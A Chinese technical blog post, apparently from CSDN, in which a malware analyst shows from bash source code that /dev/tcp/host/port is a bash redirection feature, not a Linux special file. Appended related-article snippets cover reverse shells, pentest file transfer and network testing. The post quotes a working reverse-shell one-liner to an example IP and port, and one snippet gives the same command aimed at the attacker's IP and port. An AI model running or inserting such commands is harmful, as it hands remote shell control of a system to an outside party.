关于/dev/tcp/host/port

最新推荐文章于 2024-05-20 08:58:03 发布
最新推荐文章于 2024-05-20 08:58:03 发布
阅读量1.8k 收藏 4
点赞数 7
分类专栏: 安全 文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DaoDivDiFang/article/details/106899847
版权

一直没打算接触web、渗透之类的,不过前不久为了搞清楚一个恶意软件的服务端实现(客户端逆完了,但是有些地方只能看服务端实现才能确定猜测是否正确,因为有些场景触发不了),所以现学了一下,拿到了几台Windows服务器和Linux服务器。

接触到反弹shell,常见的:bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
我能理解这是建立一个tcp连接,不能理解的是搜索了好多都说/dev/tcp/host/port是Linux的特殊文件。
在这里插入图片描述
在这里插入图片描述
。。。等等,其他搜索到的也差不多是这么说。

虽然Linux了解不多,Linux内核源码也只零散看过一些,但是从不记得有这个文件。

在sh或者对/dev/tcp/host/port进行访问、监控系统调用后(sh无法创建,读写文件肯定是找不到,看系统调用并没有对/dev/tcp/host/port的io操作,ioctl等也没有),猜测是不是bash提供的功能,查看bash源码发现:
在这里插入图片描述
看注释和代码验证了我的猜想,是个毛线的Linux特殊文件!

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
以上就是bash对/dev/tcp/的处理,截取出ip、端口,建立tcp连接。

我不懂的是他们是真的以为是一个文件还是怎样,太误导人了,实事求是不好吗

卓桐
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
7重定向-命令执⾏-脚本1
08-04
* `/dev/tcp/host/port`:打开相对应的TCP socket * `/dev/udp/host/port`:打开相对应的UDP socket 这些重定向操作符可以放在简单命令的任何位置,包括前置、中间或后置。重定向按照操作符出现的顺序从左向右进行...
【bash】关于 /dev/(tcp|udp)/${HOST}/${PORT}
michaelwoshi的博客
09-21 6173
一、实验背景 Linux中的一个特殊文件:/dev/tcp 打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。 我们可以通过重定向实现基于tcp/udp协议的软件通讯,/dev/tcp/host/port 只要读取或者写入这个文件,相当于系统会尝试连接:host 这台机器,对应port端口。 如果主机以及端口...
反弹shell总结
weixin_44576725的博客
04-26 4530
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
使用bash shell来测试网络连接或通信 _ 统信 _ 麒麟 _ 中科方德
最新发布
鹏大圣运维
05-20 529
Hello,大家好啊!今天我们将讨论如何在国产操作系统统信UOS、麒麟KOS以及中科方德上使用bash shell的内置特性/dev/tcp来测试网络连接或进行简单的网络通信。这种方法不仅简便,而且非常适合快速排查网络问题。接下来,我将为大家详细介绍具体操作步骤。
/dev/tcp/*/*
lyndon
11-21 9094
一些文件名在重定向中被 bash 特殊处理
/dev/tcp 查看服务和端口
weixin_44597836的博客
06-01 1761
Linux下通信调试网络调试工具: 常用的如 tcpdump,nc,lsof,netstat,telnet 可以快速调试tcp,udp服务 今天介绍一个在shell中非常方便的 /dev/tcp/ip/端口 原理 linux中有一个特殊的文件/dev/tcp,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。 以读写方式打开/dev/tcp,并指定服务器名为: www.csdn.net,端口号为:80 exec 6&l
渗透测试中的文件传输技巧
whatday的专栏
07-02 1098
目录 搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP server Windows Linux Setup HTTP PUT server 使用 Nginx 搭建 HTTP PUT Server 使用 Python 搭建 HTTP PUT Server 上传文件到 HTTP PUT server Linux Windows 使用 Bash
instantclient-basic-windows.x64-11.2.0.4.0.rar
07-17
(ADDRESS = (PROTOCOL = TCP)(HOST = your_host)(PORT = your_port)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = your_service_name) ) ) ``` 3. **配置PL/SQL Developer**:启动PL/SQL ...
elk+springboot+kafka日志跟踪配置1
08-08
在上述配置中,spring.application.name 和 spring.logstash.server 两个属性来自 application.yml 文件,可以根据不同的环境(dev、test、prod)进行配置。 Kafka 集成 在 SpringBoot 项目中,需要添加 Kafka ...
串口读写重定向到tcp
11-27
-p port TCP port to listen on -c com COM port to connect to -b baudrate Baudrate to use Attention: 1> If the host have no IP address, use localhost 2> default setting is : -a localhost -...
plsqldev1105
04-07
plsql最新版安装包 如果未安装oracle的,默认读取本... (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.1.213)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = orcl) ) )
linux中的一个特殊文件: /dev/tcp
热门推荐
zhjutao的专栏
02-28 1万+
linux中的一个特殊文件: /dev/tcp       有一个特殊的文件/dev/tcp,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。 1.打开/dev/tcp     以读写方式打开/dev/tcp,并指定服务器名为: www.csdn.net,端口号为:80,指定描述符为8         ex
linux命令读取udp表,Linux shell脚本中发起tcp、udp连接
weixin_28711397的博客
04-28 485
发个好玩的东东。通过/dev/tcp、/dev/udp可以直接在shell脚本中发起tcp、udp连接,方便又高效,平时用于测试啥的还是挺方便的。先看下bash man里面的介绍,/dev/tcp/host/portIf host is a valid hostname or Internet address, and port isan integer port number or servic...
linux /dev/snd,linux – / dev / tcp去了哪里?
weixin_39551188的博客
05-16 660
参见英文答案 > /dev/tcp not found????????????????????????????????????1个>????????????/dev/tcp not present in Linux????????????????????????????????????1个/ dev / tcp经常在许多来源中提到,我想我不久前在Ubuntu中看到过它.现在,在Debi...
/dev/tcp 的简单应用
hambaga的博客
08-12 5471
bash -i >& /dev/tcp/攻击者ip/攻击者监听端口 0>&1
内网渗透-信息收集
weixin_47696216的博客
11-03 4435
00 信息收集的方向 1. 主机存活探测 2. 主机端口开放情况 3. 主机服务探测 4. 主机操作系统探测 5. 网段分布情况 6. 漏洞信息探测 7. 主机内部信息搜集/域内信息搜集 01 主机内部信息收集 操作系统默认ttl值 ① WINDOWS NT/2000 TTL:128 ② WINDOWS 95/98 TTL:32 ③ UNIX...
带你读懂bash一句话反弹shell
qq_42303523的博客
02-22 1852
需要知道的linux知识 标准输入、标准输出、标准错误 在linux中输入一条命令会打开三个文件:标准输入、标准输出、标准错误。 在任何时候这个进程希望读取东西的时候都会从它的标准输入进行读取,在任何时候这个进程有输出的时候都会写入到标准输出,在任何时候这个进程有错误信息的时候都会写入到标准错误。 重定向 一般情况下,标准输入都是键盘,标准输出和标准错误都是显示器。 所谓的重定向,就是修改标准输入、标准输出、标准错误的读取或写入的对象。 常用的重定向操作符号有以下几个: 命令 说明 comm
function __get() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- }解释这段脚本
06-13
exec 3<>/dev/tcp/${HOST}/$PORT ``` 使用 Bash 的特殊文件 `/dev/tcp` 打开一个 TCP 连接,并将连接的文件描述符 `3` 关联到这个连接。`${HOST}` 和 `${PORT}` 表示主机名和端口号。 ``` echo -en "GET ${DOC} ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值